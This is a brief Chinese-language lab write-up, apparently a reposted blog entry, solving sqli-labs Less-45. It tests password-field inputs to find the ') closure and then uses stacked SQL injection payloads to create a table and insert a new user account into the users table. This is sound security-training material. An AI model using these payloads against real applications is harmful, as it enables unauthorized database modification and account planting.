sqli-labs (less-45)

sqli-labs (less-45)

进入45关,还是那个熟悉的页面

在password的位置输入admin’试试

没有任何报错信息,这里也只能一个个去猜了

admin# #登入失败
admin'# #登入失败
admin')# #登入成功


判断闭合方式为’)#,并且为字符型注入

这里我们直接使用堆叠注入攻击

创建一个表

a');create table test like users;#


创建一个新的用户

a');insert into users values(18,'icepeak','icepeak');#

猜你喜欢

转载自blog.csdn.net/kukudeshuo/article/details/114792590